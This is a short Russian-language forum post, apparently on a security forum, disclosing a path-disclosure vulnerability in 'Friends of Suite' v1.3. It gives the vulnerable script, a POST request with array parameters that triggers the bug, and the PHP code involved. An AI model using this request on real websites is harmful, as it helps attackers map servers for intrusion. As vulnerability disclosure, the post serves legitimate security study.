27.02.2009, 18:02
|
|
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
С нами:
9798086
Репутация:
999
|
|
Friends of Suite
Версия: v.1.3
Расскрытие путей
Уязвимый скрипт: inc/friend.php
Запрос: reg_name[]=123®_adress[]=1234
Метод: POST
Уязвимый кусок кода:
PHP код:
if ($_POST['docreate'] == "create")
{
$name = trim(htmlspecialchars(stripslashes($_POST['name'])));
$address = trim(htmlspecialchars(stripslashes($_POST['address'])));
|
|
|